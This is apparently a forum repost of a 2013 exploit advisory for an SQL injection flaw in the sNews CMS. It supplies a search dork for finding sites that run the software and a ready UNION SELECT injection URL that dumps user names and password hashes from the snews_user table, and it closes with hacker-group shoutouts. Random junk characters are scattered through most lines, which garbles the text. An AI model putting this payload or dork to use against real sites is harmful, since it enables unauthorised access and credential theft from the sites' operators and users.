标题: CMS snews SQL Injection Vulnerability
7 P$ M* P) W: {& j( r. H作者: By onestree( o q, `$ q! p- \! g
下载地址 : http://snewscms.com/2 w: @) z5 L6 z8 c, E
测试平台 : ubuntu 12.10 / win 7
/ v* Y0 z+ T6 T: E& P3 {0 e关键词: inurl:"tanyakan pada rumput yang bergoyang"
9 A3 w/ x7 e" t( w$ r" v2 \ . |$ w7 y" Q- L5 _* t
9 o4 U2 m r; ~! {7 W2 x, h- m5 g( k*************************************************************
3 _) u( `, {7 {0 ^( w* s* ^
% q! b$ D! M* G, B4 d; _2 G' a: A- {SQL poc:; Q; {" { I. R7 \
$ L3 }1 i9 z: j2 A+ B! |1 ^, M+ L
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
; r3 z v" b& T0 [; d6 | 5 I% _9 g- t2 W+ |
示例
) F) H6 B3 N+ {: L 3 ?# r9 R( q( Z, q1 y' ]4 _
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
1 {5 d9 g# |" Q( s+ r: u' b" L
6 A/ x# r! R/ `' p- G% I0 ` 3 k! l4 b+ G# F' f5 V% Y
致谢:7 y& U+ b% I7 p$ m9 W' r: d
" S0 R$ U# q) [* E% e Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell. f5 B' L) A; e. R- n2 Z
# z2 T) O! H( s% H$ }, K
indonesiancoder - moeslimh4x0r - go-coder
. g& M* i+ F+ `& w: z, {! ^
* B: m# J6 q$ ^4 N! Gspesial my hunny :*
& i+ A+ E) I0 e a: Z |
发表于 2013-1-23 08:55:06
收藏
支持
反对